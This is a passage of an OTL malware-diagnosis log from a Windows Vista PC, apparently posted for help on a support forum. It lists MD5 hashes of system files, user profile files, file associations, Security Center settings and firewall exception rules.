[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\drivers\AGP440.sys

[2006.11.02 10:49:52 | 000,053,864 | ---- | M] (Microsoft Corporation) MD5=EF23439CDD587F64C2C1B8825CEAD7D8 -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_920a2c1f\AGP440.sys

 
 < MD5 for: ATAPI.SYS  >

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\drivers\atapi.sys

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_b12d8e84\atapi.sys

[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6002.18005_none_df23a1261eab99e8\atapi.sys

[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_cc18792d\atapi.sys

[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys

[2006.11.02 10:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys

[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_7de13c21\atapi.sys

[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.16632_none_db337a442479c42c\atapi.sys

[2011.02.19 16:35:41 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=E03E8C99D15D0381E02743C36AFC7C6F -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.20757_none_dbac78a93da31a8b\atapi.sys

 
 < MD5 for: CNGAUDIT.DLL  >

[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\System32\cngaudit.dll

[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.0.6000.16386_none_e62d292932a96ce6\cngaudit.dll

 
 < MD5 for: EXPLORER.EXE  >

[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=37440D09DEAE0B672A04DCCF7ABF06BE -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16771_none_4f83bb287ccdb7e3\explorer.exe

[2011.02.19 16:34:35 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18164_none_5177ca9879e978e8\explorer.exe

[2011.02.19 16:34:35 | 002,927,616 | ---- | M] (Microsoft Corporation) MD5=50BA5850147410CDE89C523AD3BC606E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.22298_none_51e4f8c7931bd1e1\explorer.exe

[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=6D06CD98D954FE87FB2DB8108793B399 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16549_none_4fac29707cae347a\explorer.exe

[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=BD06F0BF753BC704B653C3A50F89D362 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20668_none_501f261995dcf2cf\explorer.exe

[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\explorer.exe

[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6002.18005_none_53a0201e76de3a0b\explorer.exe

[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=E7156B0B74762D9DE0E66BDCDE06E5FB -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20947_none_5033cb5995cd990b\explorer.exe

[2006.11.02 10:45:07 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=FD8C53FB002217F6F888BCF6F5D7084D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16386_none_4f7de5167cd15deb\explorer.exe

[2008.01.19 08:33:10 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=FFA764631CB70A30065C12EF8E174F9F -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18000_none_51b4a71279bc6ebf\explorer.exe

 
 < MD5 for: IASTOR.SYS  >

[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\64\HDD\IaStor.sys

[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver64\IaStor.sys

[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\32\HDD\IaStor.sys

[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver\IaStor.sys

 
 < MD5 for: IASTORV.SYS  >

[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_c9df7691\iaStorV.sys

[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.0.6001.18000_none_af11527887c7fa8f\iaStorV.sys

[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\drivers\iaStorV.sys

[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_37cdafa4\iaStorV.sys

 
 < MD5 for: NETLOGON.DLL  >

[2006.11.02 10:46:11 | 000,559,616 | ---- | M] (Microsoft Corporation) MD5=889A2C9F2AACCD8F64EF50AC0B3D553B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6000.16386_none_fb80f5473b0ed783\netlogon.dll

[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\System32\netlogon.dll

[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6002.18005_none_ffa3304f351bb3a3\netlogon.dll

[2008.01.19 08:35:36 | 000,592,384 | ---- | M] (Microsoft Corporation) MD5=A8EFC0B6E75B789F7FD3BA5025D4E37F -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6001.18000_none_fdb7b74337f9e857\netlogon.dll

 
 < MD5 for: NVSTOR.SYS  >

[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\drivers\nvstor.sys

[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_733654ff\nvstor.sys

[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_31c3d71d\nvstor.sys

[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.0.6001.18000_none_39dac327befea467\nvstor.sys

 
 < MD5 for: SCECLI.DLL  >

[2008.01.19 08:36:19 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=28B84EB538F7E8A0FE8B9299D591E0B9 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6001.18000_none_380de25bd91b6f12\scecli.dll

[2006.11.02 10:46:12 | 000,176,640 | ---- | M] (Microsoft Corporation) MD5=80E2839D05CA5970A86D7BE2A08BFF61 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6000.16386_none_35d7205fdc305e3e\scecli.dll

[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\System32\scecli.dll

[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6002.18005_none_39f95b67d63d3a5e\scecli.dll

 
 < MD5 for: USER32.DLL  >

[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=63B4F59D7C89B1BF5277F1FFEFD491CD -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16438_none_cb39bc5b7047127e\user32.dll

[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=9D9F061EDA75425FC67F0365E3467C86 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.20537_none_cbc258dc896598f1\user32.dll

[2008.01.19 08:36:46 | 000,627,200 | ---- | M] (Microsoft Corporation) MD5=B974D9F06DC7D1908E825DC201681269 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6001.18000_none_cd386c416d5c7f32\user32.dll

[2006.11.02 10:46:13 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=E698A5437B89A285ACA3FF022356810A -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16386_none_cb01aa4570716e5e\user32.dll

[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\System32\user32.dll

[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6002.18005_none_cf23e54d6a7e4a7e\user32.dll

 
 < MD5 for: USERINIT.EXE  >

[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\System32\userinit.exe

[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe

[2006.11.02 10:45:50 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=22027835939F86C3E47AD8E3FBDE3D11 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6000.16386_none_d9f1f819d4c4e737\userinit.exe

 
 < MD5 for: WINLOGON.EXE  >

[2012.12.14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe

[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\System32\winlogon.exe

[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6002.18005_none_71ae7a22d2134741\winlogon.exe

[2006.11.02 10:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe

[2008.01.19 08:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe

 
 < MD5 for: WS2IFSL.SYS  >

[2006.11.02 09:58:26 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=84620AECDCFD2A7A14E6263927D8C0ED -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6000.16386_none_4d4fded8cae2956d\ws2ifsl.sys

[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\System32\drivers\ws2ifsl.sys

[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6001.18000_none_4f86a0d4c7cda641\ws2ifsl.sys

 
 < %systemroot%\system32\drivers\*.sys /lockedfiles >

 
 < %systemroot%\System32\config\*.sav >

[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\COMPONENTS.SAV

[2006.11.02 11:34:05 | 000,020,480 | ---- | M] () -- C:\Windows\System32\config\DEFAULT.SAV

[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\SECURITY.SAV

[2006.11.02 11:34:08 | 010,133,504 | ---- | M] () -- C:\Windows\System32\config\SOFTWARE.SAV

[2006.11.02 11:34:08 | 001,826,816 | ---- | M] () -- C:\Windows\System32\config\SYSTEM.SAV

 
 < %systemroot%\system32\*.dll /lockedfiles >

 
 < %USERPROFILE%\*.* >

[2012.06.03 16:11:51 | 000,000,021 | ---- | M] () -- C:\Users\TuS\.gtk-bookmarks

[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel

[2012.09.11 20:05:02 | 000,224,118 | ---- | M] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg

[2013.02.18 23:33:26 | 002,097,152 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT

[2013.02.18 23:33:26 | 000,262,144 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG1

[2011.02.18 16:50:49 | 000,000,000 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG2

[2013.02.18 17:31:30 | 000,065,536 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TM.blf

[2013.02.18 17:31:30 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000001.regtrans-ms

[2011.02.18 17:19:44 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000002.regtrans-ms

[2011.02.18 16:50:50 | 000,000,020 | -HS- | M] () -- C:\Users\TuS\ntuser.ini

[2012.11.20 19:18:36 | 000,047,432 | ---- | M] () -- C:\Users\TuS\umbrella0.log

 
 < %USERPROFILE%\Local Settings\Temp\*.exe >

 
 < %USERPROFILE%\Local Settings\Temp\*.dll >

 
 < %USERPROFILE%\Application Data\*.exe >

 
 < HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs >

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

 
 <           >
 

< End of report >

--- --- ---

[QUOTE=Extras.txt]OTL Logfile:

Code:

OTL Extras logfile created on: 18.02.2013 23:28:40 - Run 1

OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop

Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation

Internet Explorer (Version = 9.0.8112.16421)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

 

1,93 Gb Total Physical Memory | 0,84 Gb Available Physical Memory | 43,54% Memory free

4,10 Gb Paging File | 2,67 Gb Available in Paging File | 65,16% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

 

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 222,88 Gb Total Space | 174,72 Gb Free Space | 78,39% Space Free | Partition Type: NTFS

Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32

Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS

Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS

Drive H: | 465,65 Gb Total Space | 206,65 Gb Free Space | 44,38% Space Free | Partition Type: FAT32

 

Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

 
 ========== Extra Registry (SafeList) ==========

 

 
 ========== File Associations ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)

.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)

 

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]

.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

 
 ========== Shell Spawning ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)

htmlfile [edit] -- Reg Error: Key error.

htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [AddToPlaylistVLC] -- "C:\Program Files\VLC Player\vlc.exe" --started-from-file --playlist-enqueue "%1" ()

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Directory [PlayWithVLC] -- "C:\Program Files\VLC Player\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()

Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)

Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

 
 ========== Security Center Settings ==========

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"cval" = 1

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

"AntiVirusOverride" = 0

"AntiSpywareOverride" = 0

"FirewallOverride" = 0

"VistaSp1" = Reg Error: Unknown registry data type -- File not found

"VistaSp2" = Reg Error: Unknown registry data type -- File not found

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

 
 ========== Firewall Settings ==========

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

"DisableNotifications" = 0

"EnableFirewall" = 1

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

"DisableNotifications" = 0

"EnableFirewall" = 1

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]

"DisableNotifications" = 0

"EnableFirewall" = 1

 
 ========== Authorized Applications List ==========

 

 
 ========== Vista Active Open Ports Exception List ==========

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{057D27D1-B87A-43B4-8BF7-619F9B2DF478}" = rport=3702 | protocol=17 | dir=out | app=%systemroot%\system32\p2phost.exe | 

"{0A70B203-CD7F-41C2-BFD8-EB5A8B4B4349}" = rport=3540 | protocol=17 | dir=out | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 

"{206286A9-5709-4AEE-BE25-1D359BB6B697}" = lport=3587 | protocol=6 | dir=in | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 

"{21B6C9B4-B224-434B-B786-16C397DAE91F}" = lport=5722 | protocol=6 | dir=in | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 

"{23540C13-646E-4035-A0AA-BCA5F6789642}" = lport=3587 | protocol=6 | dir=in | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 

"{270DFD55-1C59-4102-8356-9FC4C85F2333}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 

"{4433E133-38A7-4517-A121-057F86527125}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 

"{44F4B623-327D-447E-A5E9-BADA5404472D}" = lport=3540 | protocol=17 | dir=in | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 

"{51782EC5-5106-4C58-9335-ADB35D8526F3}" = rport=5722 | protocol=6 | dir=out | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 

"{73922679-2FA8-4CD9-B1C3-6483D115C3A7}" = rport=3702 | protocol=17 | dir=out | app=%systemroot%\system32\p2phost.exe | 

"{7E96D817-15F3-425C-8599-FCC0FAD660CC}" = lport=3702 | protocol=17 | dir=in | app=%systemroot%\system32\p2phost.exe | 

"{8E7064EA-3EF1-47BA-BD0D-20E760B4A099}" = lport=3702 | protocol=17 | dir=in | app=%systemroot%\system32\p2phost.exe | 

"{8F82233B-3ECE-43A3-BEE8-B07624BBBA4C}" = rport=5722 | protocol=6 | dir=out | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 

"{9C9C09DE-B81F-48DA-86B6-38C5D1D55829}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 

"{9E555EE3-C125-40A2-8D57-6B19969C9440}" = lport=5722 | protocol=6 | dir=in | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 

"{A22F06AF-89EF-4215-AB25-5F35286067F1}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 

"{AA99495E-47B0-4118-BEE4-47A39EC45D51}" = rport=3587 | protocol=6 | dir=out | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 

"{B3535AD2-5D0E-41DB-AE6F-1DE9B36B5D2F}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe | 

"{D16BD2BF-ADA8-4B79-867D-348827EBFA31}" = rport=3587 | protocol=6 | dir=out | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 

"{D67306CB-3431-4BB3-8513-DFEFEB9CB82D}" = rport=3540 | protocol=17 | dir=out | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 

"{FE136888-106D-4079-B7BA-94F51B5B9C7D}" = lport=3540 | protocol=17 | dir=in | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 

 
 ========== Vista Active Application Exception List ==========

 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{0819217F-77E9-4E62-8F9C-825430376B8F}" = dir=in | app=c:\program files\itunes\itunes.exe | 

"{095C0471-5E91-4D4E-A99E-65BC95ED0459}" = protocol=6 | dir=in | app=c:\program files\pinnacle\shared files\programs\strmserver\strmserver.exe | 

"{0A6129E9-AB35-44CA-9126-61C9240A5FDA}" = protocol=17 | dir=in | app=c:\program files\common files\pctv systems\pvr\videocontrol.exe | 

"{1171A7E0-ED4C-44FE-BA71-4B92D901D573}" = protocol=17 | dir=in | app=c:\program files\common files\pctv systems\streamingserver\strmserver.exe | 

"{15ACA777-C543-45D1-AFB2-CCD314B8ECF9}" = protocol=17 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 

"{215C8497-7D58-431C-8243-AA3D3C005ADA}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 

"{2526B81B-0AD0-4F14-A024-7EBF67F4C2C6}" = protocol=6 | dir=out | app=%systemroot%\system32\p2phost.exe | 

"{2B2B4BB3-0B9D-41E5-AA2B-AB2FC39ED731}" = protocol=6 | dir=in | app=c:\program files\common files\pctv systems\pvr\videocontrol.exe | 

"{2F415971-FFC0-4D66-A1BE-6FC5E52C86D3}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe | 

"{5096DAFF-47E2-471E-9EBA-8662273B37DF}" = protocol=6 | dir=in | app=c:\program files\common files\pctv systems\streamingserver\strmserver.exe | 

"{520BE724-8A03-43CA-80C2-5AEA79E756DA}" = dir=in | app=c:\program files\skype\phone\skype.exe | 

"{55F89377-B20F-4B3E-89B8-B99FE1BB8631}" = protocol=17 | dir=in | app=c:\program files\pctv systems\tvcenter\tvcenter.exe | 

"{59F9AFCC-4B25-47D8-8D03-3C194B899FF2}" = protocol=6 | dir=out | app=%systemroot%\system32\p2phost.exe | 

"{5E8F2ECF-06F7-423A-859B-1E8DC00370C0}" = protocol=6 | dir=in | app=%systemroot%\system32\p2phost.exe | 

"{69FD919F-0009-4345-A4DE-06E2DE399108}" = protocol=6 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 

"{7500E32D-86F6-40A8-B76E-8EA19B7428E5}" = protocol=6 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 

"{82930E01-7C8D-431C-AEC1-D6BE0F54D0B8}" = protocol=6 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 

"{87C2F6AE-D78B-4BD0-AE32-7194A4E3156B}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe | 

"{A5160E46-A4F1-4377-AF9D-96E5105C1C4F}" = protocol=17 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 

"{AD06B8E8-7AF8-49A2-92B0-026E31DADE86}" = protocol=6 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 

"{B63EB692-B61B-42F0-AABB-1B40B6DA6ACC}" = protocol=6 | dir=in | app=%systemroot%\system32\p2phost.exe | 

"{B8433C53-6A69-42E4-9740-C5A82EC8916D}" = protocol=6 | dir=in | app=c:\program files\pctv systems\tvcenter\tvcenter.exe | 

